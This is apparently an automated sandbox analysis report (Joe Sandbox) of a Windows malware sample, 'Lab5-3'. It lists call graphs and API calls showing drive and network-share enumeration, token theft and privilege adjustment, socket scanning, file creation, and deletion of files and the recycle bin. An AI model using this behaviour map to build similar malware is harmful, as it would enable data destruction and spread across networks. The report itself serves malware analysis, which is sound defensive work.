5308 40f221 5307->5308 5308->5291 5309 40c510 8 API calls 5308->5309 5310 40f236 5309->5310 5310->5291 5311 40c510 8 API calls 5310->5311 5312 40f24b 5311->5312 5312->5291 5313 40bd30 23 API calls 5312->5313 5313->5291 5315 40ee84 5314->5315 5316 40c510 8 API calls 5315->5316 5332 40eee3 5315->5332 5337 40efb6 5315->5337 5319 40eeae 5316->5319 5317 40add0 free 5320 40effd 5317->5320 5318 40c510 8 API calls 5321 40ef22 5318->5321 5324 40c550 8 API calls 5319->5324 5319->5337 5323 40add0 free 5320->5323 5327 40c550 8 API calls 5321->5327 5321->5337 5322 40bf10 9 API calls 5325 40ef8d 5322->5325 5326 40f006 5323->5326 5328 40eec8 5324->5328 5331 40c510 8 API calls 5325->5331 5325->5337 5326->5103 5329 40ef3e 5327->5329 5330 40bd30 23 API calls 5328->5330 5328->5337 5334 40bd30 23 API calls 5329->5334 5329->5337 5330->5332 5333 40efa2 5331->5333 5332->5318 5335 40ef59 5332->5335 5332->5337 5336 40bd30 23 API calls 5333->5336 5333->5337 5334->5335 5335->5322 5335->5337 5336->5337 5337->5317 5339 40d810 5338->5339 5342 40d818 5338->5342 5339->4817 5340 40d8c7 5357 40d8f0 5340->5357 5341 40d8af 5348 40de20 5341->5348 5342->5340 5342->5341 5347 40d8bd 5342->5347 5345 40d8d3 5345->4817 5346 40d8b5 5346->4817 5347->4817 5350 40de38 5348->5350 5349 40df20 5349->5346 5350->5349 5351 40c0e0 5 API calls 5350->5351 5355 40dea3 5351->5355 5352 40debd 5353 40add0 free 5352->5353 5354 40df03 5353->5354 5354->5346 5355->5352 5356 40a5e0 28 API calls 5355->5356 5356->5352 5359 40d91a 5357->5359 5358 40d921 5358->5345 5359->5358 5360 40c0e0 5 API calls 5359->5360 5363 40d99f 5360->5363 5361 40add0 free 5362 40dda0 5361->5362 5364 40add0 free 5362->5364 5366 409f60 3 API calls 5363->5366 5429 40d9c1 5363->5429 5365 40dda9 5364->5365 5367 40add0 free 5365->5367 5368 40d9d8 5366->5368 5369 40ddb2 5367->5369 5373 40d9fe 5368->5373 5396 40da5f 5368->5396 5368->5429 5439 40dc1d 5368->5439 5370 40ddcd 5369->5370 5371 40add0 free 5369->5371 5374 40add0 free 5370->5374 5375 40ddc4 5371->5375 5372 40a5e0 28 API calls 5376 40dc49 5372->5376 5377 40bf10 9 API calls 5373->5377 5378 40ddd9 5374->5378 5380 40add0 free 5375->5380 5383 40a5e0 28 API calls 5376->5383 5376->5429 5381 40da06 5377->5381 5382 40add0 free 5378->5382 5379 40acd0 5 API calls 5379->5396 5380->5370 5387 40bd30 23 API calls 5381->5387 5381->5429 5384 40dde2 5382->5384 5386 40dc72 5383->5386 5385 40add0 free 5384->5385 5388 40ddeb 5385->5388 5392 40c550 8 API calls 5386->5392 5386->5429 5390 40da1e 5387->5390 5391 40add0 free 5388->5391 5389 40ae20 10 API calls 5389->5396 5394 40bf10 9 API calls 5390->5394 5390->5429 5395 40ddf4 5391->5395 5393 40dc90 5392->5393 5399 40bf10 9 API calls 5393->5399 5393->5429 5397 40da39 5394->5397 5398 40add0 free 5395->5398 5396->5379 5396->5389 5401 40dacd 5396->5401 5396->5429 5403 40bd30 23 API calls 5397->5403 5397->5429 5400 40ddfd 5398->5400 5402 40dcae 5399->5402 5400->5345 5404 40b500 34 API calls 5401->5404 5407 40bd30 23 API calls 5402->5407 5402->5429 5405 40da57 5403->5405 5406 40dade 5404->5406 5410 40bf10 9 API calls 5405->5410 5405->5429 5409 40a5e0 28 API calls 5406->5409 5406->5429 5408 40dccc 5407->5408 5411 40bf10 9 API calls 5408->5411 5408->5429 5409->5405 5412 40db16 5410->5412 5413 40dcea 5411->5413 5414 40bd30 23 API calls 5412->5414 5412->5429 5415 409cd0 8 API calls 5413->5415 5413->5429 5416 40db31 5414->5416 5417 40dd08 5415->5417 5418 40c510 8 API calls 5416->5418 5416->5429 5420 40dd3f 5417->5420 5422 40bf10 9 API calls 5417->5422 5417->5429 5419 40db4d 5418->5419 5424 40c510 8 API calls 5419->5424 5419->5429 5421 40a5e0 28 API calls 5420->5421 5420->5429 5421->5429 5423 40dd2b 5422->5423 5426 40bd30 23 API calls 5423->5426 5423->5429 5425 40db69 5424->5425 5427 40acd0 5 API calls 5425->5427 5425->5429 5426->5420 5428 40db87 5427->5428 5428->5429 5430 40bf10 9 API calls 5428->5430 5429->5361 5431 40dba5 5430->5431 5431->5429 5432 409cd0 8 API calls 5431->5432 5433 40dbc0 5432->5433 5433->5429 5434 40acd0 5 API calls 5433->5434 5435 40dbe4 5434->5435 5435->5429 5436 40bf10 9 API calls 5435->5436 5437 40dc02 5436->5437 5437->5429 5438 409cd0 8 API calls 5437->5438 5438->5439 5439->5372 5439->5429 5441 4180c4 NtRemoveIoCompletion 5440->5441 5441->5441 5450 4180e5 __allrem 5441->5450 5442 418247 RtlDosPathNameToNtPathName_U 5444 418269 malloc 5442->5444 5442->5450 5443 4184c2 NtClose GlobalFree GlobalFree 5443->5441 5444->5450 5445 4182fa NtClose GlobalFree GlobalFree 5445->5441 5446 418495 ReadFile 5446->5450 5447 4182ad NtSetInformationFile free 5447->5450 5449 418228 WriteFile 5449->5450 5450->5441 5450->5442 5450->5443 5450->5445 5450->5446 5450->5447 5450->5449 5451 4183f8 WriteFile 5450->5451 5452 4183df NtClose GlobalFree GlobalFree 5450->5452 5454 4184e0 5450->5454 5451->5450 5452->5451 5455 412920 6 API calls 5454->5455 5457 4184fd 5455->5457 5456 418545 5456->5450 5457->5456 5458 40d800 45 API calls 5457->5458 5459 4185c0 5458->5459 5459->5450 5459->5459 5489 4176f0 GetShellWindow 5460->5489 5462 40fa7c 5463 40fa8f 5462->5463 5497 40fae0 GetLogicalDrives 5462->5497 5465 40fae0 206 API calls 5463->5465 5466 40fa94 ExitThread 5465->5466 5469 41a4d1 5468->5469 5470 41a473 malloc 5468->5470 5471 41a487 RtlInitializeSListHead RtlInitializeCriticalSection Sleep 5470->5471 5472 41a4cb WSACleanup 5470->5472 5547 41a130 malloc 5471->5547 5472->5469 5475 41a4b4 RtlInterlockedFlushSList RtlDeleteCriticalSection 5475->5472 5476 41a4dc 5477 41a4e0 CreateThread 5476->5477 5479 41a515 Sleep 5476->5479 5477->5476 5478 41a4ff NtSetInformationThread 5477->5478 5561 419bd0 5477->5561 5478->5476 5479->5479 5480 41a525 5479->5480 5480->5479 5481 41a52e RtlInterlockedFlushSList RtlDeleteCriticalSection WSACleanup 5480->5481 5482 41a554 free 5481->5482 5483 41a55e ExitThread 5481->5483 5482->5483 5485 417790 18 API calls 5484->5485 5486 40fabc 5485->5486 5487 40fac5 ExitThread 5486->5487 5488 40fae0 206 API calls 5486->5488 5488->5487 5490 417700 5489->5490 5491 417704 GetWindowThreadProcessId OpenProcess 5489->5491 5490->5462 5492 417782 5491->5492 5493 417727 OpenProcessToken 5491->5493 5492->5462 5494 417774 CloseHandle CloseHandle 5493->5494 5495 417738 DuplicateToken 5493->5495 5494->5492 5495->5494 5496 41774b SetThreadToken CloseHandle CloseHandle CloseHandle 5495->5496 5496->5462 5498 40fb10 5497->5498 5499 40fb1d GetDriveTypeW 5498->5499 5501 40fbde 5498->5501 5507 40fb95 CreateThread 5498->5507 5499->5498 5500 40fb30 malloc WNetGetConnectionW 5499->5500 5502 40fbc3 free 5500->5502 5503 40fb5d PathRemoveBackslashW OpenThreadToken 5500->5503 5508 40fbf0 WNetOpenEnumW 5501->5508 5502->5498 5503->5498 5505 40fb7d DuplicateToken 5503->5505 5505->5507 5506 40fa85 SetThreadToken 5506->5463 5507->5498 5546 40fd80 187 API calls 5507->5546 5509 40fc19 5508->5509 5510 40fc1f malloc 5508->5510 5509->5506 5511 40fc35 5510->5511 5514 40fc3a 5510->5514 5511->5506 5512 40fc4b WNetEnumResourceW 5513 40fd5a free WNetCloseEnum 5512->5513 5512->5514 5513->5506 5514->5512 5515 40fbf0 187 API calls 5514->5515 5516 40fc8b malloc 5514->5516 5517 40fcd2 OpenThreadToken 5514->5517 5519 40fd06 CreateThread 5514->5519 5515->5514 5516->5514 5517->5514 5518 40fcee DuplicateToken 5517->5518 5518->5519 5519->5514 5520 40fd25 NtSetInformationThread 5519->5520 5521 40fd80 5519->5521 5520->5514 5522 40fd97 5521->5522 5523 40fd8e SetThreadToken 5521->5523 5526 410170 RtlEnterCriticalSection 5522->5526 5523->5522 5527 4101bf wsprintfW FindFirstFileExW 5526->5527 5528 41019e 5526->5528 5530 4102f0 FindClose 5527->5530 5531 4102d6 RtlLeaveCriticalSection ExitThread 5527->5531 5528->5527 5529 4101a4 lstrcmpiW 5528->5529 5529->5528 5529->5531 5532 410364 5530->5532 5532->5532 5533 410379 wsprintfW CreateFileW 5532->5533 5534 4103e6 malloc 5533->5534 5535 4103bf 5533->5535 5537 41040e 5534->5537 5535->5534 5536 4103cc RtlLeaveCriticalSection ExitThread 5535->5536 5538 410444 RtlLeaveCriticalSection SHEmptyRecycleBinW GetDiskFreeSpaceExW 5537->5538 5539 41047d SetThreadUILanguage StrFormatByteSize64A StrFormatByteSize64A 5538->5539 5545 4104f5 5538->5545 5541 4104cf 5539->5541 5540 410530 164 API calls 5542 4104ff CloseHandle DeleteFileW ExitThread 5540->5542 5543 4104d6 wsprintfA 5541->5543 5544 40f630 14 API calls 5543->5544 5544->5545 5545->5540 5548 41a321 5547->5548 5549 41a15d GetAdaptersInfo 5547->5549 5548->5475 5548->5476 5550 41a16f free malloc 5549->5550 5551 41a18e GetAdaptersInfo 5549->5551 5550->5548 5550->5551 5552 41a310 5551->5552 5557 41a19d 5551->5557 5552->5548 5553 41a317 free 5552->5553 5553->5548 5554 41a1bd lstrcmpiA 5555 41a217 PathRemoveExtensionA 5554->5555 5554->5557 5555->5557 5556 40f630 14 API calls 5556->5557 5557->5548 5557->5552 5557->5554 5557->5556 5558 41a260 wsprintfA lstrcmpiA 5557->5558 5560 41a2dd RtlInterlockedPushEntrySList 5557->5560 5558->5557 5559 41a2b5 malloc 5558->5559 5559->5557 5560->5557 5563 419be8 5561->5563 5562 419bf0 RtlEnterCriticalSection 5562->5563 5563->5562 5564 419d17 RtlLeaveCriticalSection ExitThread 5563->5564 5565 419c0d RtlInterlockedPopEntrySList 5563->5565 5568 419c6f malloc wsprintfW 5563->5568 5569 41a330 10 API calls 5563->5569 5565->5563 5566 419c21 free RtlLeaveCriticalSection 5565->5566 5571 41a330 inet_addr htons 5566->5571 5581 419d30 5568->5581 5569->5563 5572 41a375 socket 5571->5572 5573 41a3ab 5571->5573 5572->5573 5574 41a388 ioctlsocket 5572->5574 5573->5563 5575 41a3b2 connect 5574->5575 5576 41a3a4 closesocket 5574->5576 5577 41a440 closesocket 5575->5577 5578 41a3c4 WSAGetLastError 5575->5578 5576->5573 5577->5563 5578->5576 5579 41a3d1 select 5578->5579 5579->5576 5580 41a42a __WSAFDIsSet 5579->5580 5580->5573 5580->5577 5582 419d58 5581->5582 5582->5582 5583 419d8f wsprintfA GetModuleHandleA GetProcAddress 5582->5583 5584 419e90 GetModuleHandleA GetProcAddress 5583->5584 5589 419eba 5584->5589 5586 419f50 wsprintfW WNetAddConnection2W 5587 41a067 NetShareEnum 5586->5587 5587->5589 5588 41a0b5 NetApiBufferFree 5588->5587 5588->5589 5589->5586 5589->5588 5590 41a0df 5589->5590 5592 41a0eb 5589->5592 5595 417790 OpenProcessToken 5589->5595 5590->5563 5593 410170 186 API calls 5592->5593 5594 41a125 5593->5594 5596 4177b1 GetTokenInformation 5595->5596 5597 417837 5595->5597 5598 41782d CloseHandle 5596->5598 5599 4177cf 5596->5599 5597->5589 5598->5597 5599->5598 5600 4177d6 GetTokenInformation 5599->5600 5600->5598 5601 4177ee GetTokenInformation CloseHandle 5600->5601 5601->5598 5602 417812 5601->5602 5606 4175d0 CreateToolhelp32Snapshot 5602->5606 5605 417823 5605->5589 5607 4175f5 5606->5607 5608 4176dd 5606->5608 5609 417611 Process32First 5607->5609 5608->5598 5608->5605 5610 417633 OpenProcess 5609->5610 5611 4176da CloseHandle 5609->5611 5612 4176c1 Process32Next 5610->5612 5613 41764c OpenProcessToken 5610->5613 5611->5608 5612->5610 5614 4176d7 5612->5614 5615 4176b8 CloseHandle 5613->5615 5616 41765d GetTokenInformation 5613->5616 5614->5611 5615->5612 5615->5614 5617 4176b3 CloseHandle 5616->5617 5618 417676 5616->5618 5617->5615 5618->5617 5619 417686 DuplicateToken 5618->5619 5619->5617 5620 4176a0 SetThreadToken CloseHandle 5619->5620 5620->5617 5622 401296 GdipCreateFont 5621->5622 5623 40124e 5621->5623 5626 401300 GdipDeleteFontFamily 5622->5626 5627 4012b6 5622->5627 5624 401258 GdipGetGenericFontFamilySansSerif 5623->5624 5625 401279 5623->5625 5624->5625 5625->5622 5628 401285 GdipDeleteFontFamily 5625->5628 5626->4488 5629 4012c0 GdipGetGenericFontFamilySansSerif 5627->5629 5630 4012de 5627->5630 5628->4488 5629->5630 5630->5626 5631 4012ea GdipCreateFont 5630->5631 5631->5626 5632->4495 5633->4503 5635 4011bd GdipDrawString 5634->5635 5637 4011f6 5635->5637 5637->4506 5637->4509 5639 412406 malloc 5638->5639 5640 4123ff 5638->5640 5641 412417 5639->5641 5642 41241f GdipGetImageEncoders 5639->5642 5640->4511 5641->4511 5643 412478 free 5642->5643 5644 412435 5642->5644 5643->4511 5644->5643 5645 41248c free 5644->5645 5645->4511 5647 401370 5646->5647 5648 411cf6 GetCurrentProcess OpenProcessToken 5647->5648 5649 411d14 GetTokenInformation 5648->5649 5650 411d36 5648->5650 5649->5650 5651 411d44 RegCreateKeyExA 5650->5651 5652 411d3d CloseHandle 5650->5652 5653 411e35 5651->5653 5654 411d74 5651->5654 5652->5651 5653->4535 5654->5654 5655 411da5 RegQueryValueExW 5654->5655 5656 411dd3 lstrcmpiW 5655->5656 5657 411dea RegSetValueExW 5655->5657 5656->5657 5658 411e22 RegCloseKey 5656->5658 5657->5658 5658->4535 5661 401cf0 5660->5661 5661->4542 5661->5661 5663 40f833 5662->5663 5663->5663 5664 40f841 7 API calls 5663->5664 5665 40f8bb 6 API calls 5664->5665 5666 40f89f EnableMenuItem DeleteMenu 5664->5666 5667 40f966 5665->5667 5668 40f91b 5665->5668 5666->5665 5669 40f921 PeekMessageW 5668->5669 5670 40f951 GetMessageW 5668->5670 5671 40f943 ShowWindow 5668->5671 5669->5668 5669->5670 5670->5667 5670->5669 5671->5670 5674 417500 5673->5674 5675 4174f5 5673->5675 5676 4175b3 FindVolumeClose ExitThread 5674->5676 5677 41755d QueryDosDeviceW 5674->5677 5680 4172f0 malloc 5674->5680 5677->5674 5677->5676 5679 41759c FindNextVolumeW 5679->5674 5679->5676 5681 4173f6 5680->5681 5682 41731f 5680->5682 5681->5679 5683 417320 GetVolumePathNamesForVolumeNameW 5682->5683 5684 41735f GetDriveTypeW 5682->5684 5685 417340 free malloc 5682->5685 5683->5682 5683->5684 5686 41736b 5684->5686 5685->5683 5687 417358 5685->5687 5688 417376 wsprintfW CreateFileW 5686->5688 5693 4173df 5686->5693 5687->5679 5689 4173e1 NtClose 5688->5689 5690 4173d8 5688->5690 5689->5693 5694 417400 wsprintfW SetVolumeMountPointW 5690->5694 5691 4173ec free 5691->5681 5693->5681 5693->5691 5695 417448 5694->5695 5698 417482 5694->5698 5696 4174c0 5695->5696 5697 41744e wsprintfW SetVolumeMountPointW 5695->5697 5696->5693 5697->5695 5697->5698 5698->5698 5699 40f630 14 API calls 5698->5699 5699->5696 5700 417840 OpenThreadToken 5701 417861 DuplicateToken 5700->5701 5702 41785a 5700->5702 5715 416800 GetTickCount EnumDependentServicesA 5716 416983 5715->5716 5717 416838 5715->5717 5718 416845 5717->5718 5719 41684e malloc 5717->5719 5719->5718 5720 416861 5719->5720 5721 41686c EnumDependentServicesA 5720->5721 5721->5718 5722 416886 5721->5722 5723 416977 free 5722->5723 5724 4168a0 OpenServiceA 5722->5724 5723->5716 5724->5718 5725 4168ce ControlService 5724->5725 5725->5718 5729 4168e3 5725->5729 5726 416957 CloseServiceHandle 5726->5723 5726->5724 5727 4168f0 Sleep QueryServiceStatusEx 5727->5718 5727->5729 5728 41691a GetTickCount 5728->5718 5728->5729 5729->5726 5729->5727 5729->5728 5730 40f630 14 API calls 5729->5730 5730->5729 5731 412510 CreateThread 5732 41253d 5731->5732 5733 41252e NtSetInformationThread 5731->5733 5733->5732 5738 411a30 5739 411a48 5738->5739 5740 411e40 41 API calls 5739->5740 5741 411a6e 5740->5741 5747 4125c0 NtOpenProcessToken 5748 412676 5747->5748 5749 4125dc 5747->5749 5750 4125f5 LookupPrivilegeValueA NtAdjustPrivilegesToken 5749->5750 5751 412635 5750->5751 5752 41266d CloseHandle 5750->5752 5753 40f630 14 API calls 5751->5753 5752->5748 5754 41266a 5753->5754 5754->5752 5764 41a6b0 5765 41a72f 5764->5765 5767 41a6cb 5764->5767 5766 41a70c RtlInitUnicodeString RtlInitUnicodeString 5767->5766 5703 40fa63 5704 40fa70 5703->5704 5705 4176f0 11 API calls 5704->5705 5706 40fa7c 5705->5706 5707 40fa8f 5706->5707 5708 40fae0 206 API calls 5706->5708 5709 40fae0 206 API calls 5707->5709 5711 40fa85 SetThreadToken 5708->5711 5710 40fa94 ExitThread 5709->5710 5711->5707

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 416e10-416e26 GetPEB 1 416e30-416e67 call 416990 RtlInitializeCriticalSection call 40fdb0 CreateThread 0->1 2 416e28-416e2a ExitProcess 0->2 7 416e72-416e84 Sleep call 41aa00 1->7 8 416e69-416e70 NtSetInformationThread 1->8 11 416e8a-416e99 call 412680 7->11 12 416f1d-416f24 call 412870 7->12 8->7 17 416e9b-416ea3 GetVersion 11->17 18 416efa-416f1a call 404090 call 4023c0 call 40f630 11->18 19 416f26-416f28 ExitProcess 12->19 20 416f2e-416f9d call 416b00 NtOpenProcess 12->20 17->18 23 416ea5-416ef4 GetPEB call 4124f0 call 412550 call 4124d0 call 41a8e0 call 41a740 ExitProcess 17->23 18->12 27 416fa3-416fa8 20->27 28 4170bd-4170c2 20->28 32 4170cb-4170d0 27->32 33 416fae-416fc7 GetSecurityInfo 27->33 31 4170c4-4170c5 NtClose 28->31 28->32 31->32 36 4170d2-4170d3 RtlFreeSid 32->36 37 4170d9-41711a NtSetInformationProcess RtlAdjustPrivilege GetCurrentProcess OpenProcessToken 32->37 33->28 38 416fcd-416fef RtlAllocateAndInitializeSid 33->38 36->37 41 41711c-41713a GetTokenInformation 37->41 42 41713e-417143 37->42 38->28 43 416ff5-417026 RtlQueryInformationAcl RtlLengthSid malloc 38->43 41->42 49 417145-417146 CloseHandle 42->49 50 41714c-417162 CreateThread 42->50 47 4170b7 43->47 48 41702c-417038 RtlCreateAcl 43->48 47->28 52 4170a7-4170b4 free 48->52 53 41703a-41704a RtlAddAccessDeniedAce 48->53 49->50 54 417164-41716b NtSetInformationThread 50->54 55 41716d-41716f 50->55 52->47 53->52 57 41704c-417051 53->57 54->55 58 417171-417189 CreateThread 55->58 59 417196 55->59 61 417093-4170a1 SetSecurityInfo 57->61 62 417053-417059 57->62 63 417199-4171a0 call 419330 58->63 64 41718b-417194 NtSetInformationThread 58->64 59->63 61->52 67 417060-417073 RtlGetAce 62->67 70 4171a2-4171c3 call 403fc0 call 403f40 call 40f630 ExitProcess 63->70 71 4171c9-417268 GetTickCount call 40fe80 GetTickCount call 4020b0 call 40f630 call 401a90 call 401480 63->71 64->63 67->52 69 417075-41708b RtlAddAce 67->69 69->52 72 41708d-417091 69->72 89 417279-41729e call 411e40 call 411a80 call 416b00 GetConsoleWindow IsWindowVisible 71->89 90 41726a-41726c 71->90 72->61 72->67 99 4172d1-4172e6 NtWaitForSingleObject call 416ce0 ExitProcess 89->99 100 4172a0-4172cc call 404010 call 403f80 call 40f630 call 412590 89->100 90->89 91 41726e 90->91 93 417270-417277 91->93 93->89 93->93 100->99
                                                                                                            APIs
                                                                                                            • ExitProcess.KERNEL32 ref: 00416E2A
                                                                                                            • RtlInitializeCriticalSection.NTDLL ref: 00416E3A
                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,0040F800,00000000,00000000,?), ref: 00416E5C
                                                                                                            • NtSetInformationThread.NTDLL ref: 00416E70
                                                                                                            • Sleep.KERNELBASE(000000C8), ref: 00416E77
                                                                                                            • GetVersion.KERNEL32 ref: 00416E9B
                                                                                                            • ExitProcess.KERNEL32 ref: 00416EF4
                                                                                                            Strings
                                                                                                            • Process created with limited rights, xrefs: 00416F03
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcessThread$CreateCriticalInformationInitializeSectionSleepVersion
                                                                                                            • String ID: Process created with limited rights
                                                                                                            • API String ID: 4206905793-1017407706
                                                                                                            • Opcode ID: 7c5054fbc2c2b3eb61e8084b6c6e7c30a740ba36f0c4391e36fdce4e9d1c28a9
                                                                                                            • Instruction ID: 05cdbb695343fbdcc8a9ab5b6bfd7623162124a92b84b449242241f3d851d98d
                                                                                                            • Opcode Fuzzy Hash: 7c5054fbc2c2b3eb61e8084b6c6e7c30a740ba36f0c4391e36fdce4e9d1c28a9
                                                                                                            • Instruction Fuzzy Hash: 51D1A771A40308ABEB209BA1CD49FEE7B78EF08714F144125F615F72E1DB789945CB58
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • AllocConsole.KERNELBASE ref: 0040F80C
                                                                                                            • GetConsoleWindow.KERNELBASE ref: 0040F812
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040F823
                                                                                                            • SetConsoleTitleA.KERNELBASE(?), ref: 0040F84B
                                                                                                            • SetConsoleCtrlHandler.KERNEL32(0040F980,00000001), ref: 0040F858
                                                                                                            • SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 0040F862
                                                                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 0040F86B
                                                                                                            • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 0040F87A
                                                                                                            • SetLayeredWindowAttributes.USER32(00000000,00000000,000000BF,00000002), ref: 0040F88A
                                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 0040F893
                                                                                                            • EnableMenuItem.USER32(00000000,0000F060,00000003), ref: 0040F8A7
                                                                                                            • DeleteMenu.USER32(00000000,0000F060,00000000), ref: 0040F8B5
                                                                                                            • GetConsoleMode.KERNELBASE(?,?), ref: 0040F8CD
                                                                                                            • SetConsoleMode.KERNELBASE(?,?), ref: 0040F8E6
                                                                                                            • RegisterHotKey.USER32(00000000,00000001,00000004,00000070), ref: 0040F8FA
                                                                                                            • RegisterHotKey.USER32(00000000,00000002,00000000,00000070), ref: 0040F904
                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040F911
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040F92E
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040F94F
                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040F95C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleWindow$MenuMessage$LongModeRegisterShow$AllocAttributesCtrlDeleteEnableHandlerItemLayeredParametersPeekProcessShutdownSystemTitle
                                                                                                            • String ID:
                                                                                                            • API String ID: 565067356-0
                                                                                                            • Opcode ID: f7216761dd9bd50528ad4a5ed0497bc8d7a6f9c8c917b8079963824232b8244e
                                                                                                            • Instruction ID: 4619d5a12c184a103b5ff6e4c8133339cd7322335f187e554ae5444f3d7f3d92
                                                                                                            • Opcode Fuzzy Hash: f7216761dd9bd50528ad4a5ed0497bc8d7a6f9c8c917b8079963824232b8244e
                                                                                                            • Instruction Fuzzy Hash: 2841B731684304BBE7319B609C4AFAB7BA8EB49B10F104539F651FA1E0C7B4E945C79E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 124 412680-4126ba NtOpenProcessToken 125 4126d9-4126f4 CreateWellKnownSid 124->125 126 4126bc-4126c5 124->126 125->126 127 4126f6-412708 CheckTokenMembership 125->127 128 412773-41277e 126->128 129 4126cb-4126d4 126->129 127->126 130 41270a-41270d 127->130 131 412780-412781 CloseHandle 128->131 132 412783-412788 128->132 129->128 133 41276d 130->133 134 41270f-412726 NtQueryInformationToken 130->134 131->132 135 41278a-41278b CloseHandle 132->135 136 41278d-412794 132->136 133->128 137 412728-412733 134->137 138 41274f-412762 CheckTokenMembership 134->138 135->136 137->128 139 412735-41273a 137->139 138->126 140 412768-41276b 138->140 139->128 141 41273c-41273e 139->141 140->128 140->133 142 412740-412742 141->142 143 412744-41274d 141->143 142->128 143->128
                                                                                                            APIs
                                                                                                            • NtOpenProcessToken.NTDLL(000000FF,00000008,?), ref: 004126B2
                                                                                                            • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,00000000), ref: 004126EC
                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 00412700
                                                                                                            • NtQueryInformationToken.NTDLL ref: 0041271E
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00412781
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041278B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Token$CloseHandle$CheckCreateInformationKnownMembershipOpenProcessQueryWell
                                                                                                            • String ID: D
                                                                                                            • API String ID: 4244329739-2746444292
                                                                                                            • Opcode ID: b14ed53305c88dfec7069ed67e96c18ef42929af4c20dcac252d49074078405b
                                                                                                            • Instruction ID: d177bb60be750b8cf1effd2047966f98f576c4e33534fb29f20f52fbe2eb478d
                                                                                                            • Opcode Fuzzy Hash: b14ed53305c88dfec7069ed67e96c18ef42929af4c20dcac252d49074078405b
                                                                                                            • Instruction Fuzzy Hash: 12318171A00219ABDB20CF95CE08BEFB7BCEB04700F104167E911E72D0D7B89A54CBA8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • NtAllocateVirtualMemory.NTDLL ref: 0041A91A
                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0041A930
                                                                                                            • RtlAcquirePebLock.NTDLL ref: 0041A9A0
                                                                                                            • RtlInitUnicodeString.NTDLL(?,?), ref: 0041A9CF
                                                                                                            • RtlInitUnicodeString.NTDLL(?,00000000), ref: 0041A9D9
                                                                                                            • RtlReleasePebLock.NTDLL ref: 0041A9DB
                                                                                                            • LdrEnumerateLoadedModules.NTDLL(00000000,0041A6B0,00000000), ref: 0041A9EA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InitLockStringUnicode$AcquireAllocateDirectoryEnumerateLoadedMemoryModulesReleaseVirtualWindows
                                                                                                            • String ID: nA
                                                                                                            • API String ID: 5422265-513057715
                                                                                                            • Opcode ID: ee466e4a312c861c1ef558da750f235434c80703367bf4d8034a7777c82412f6
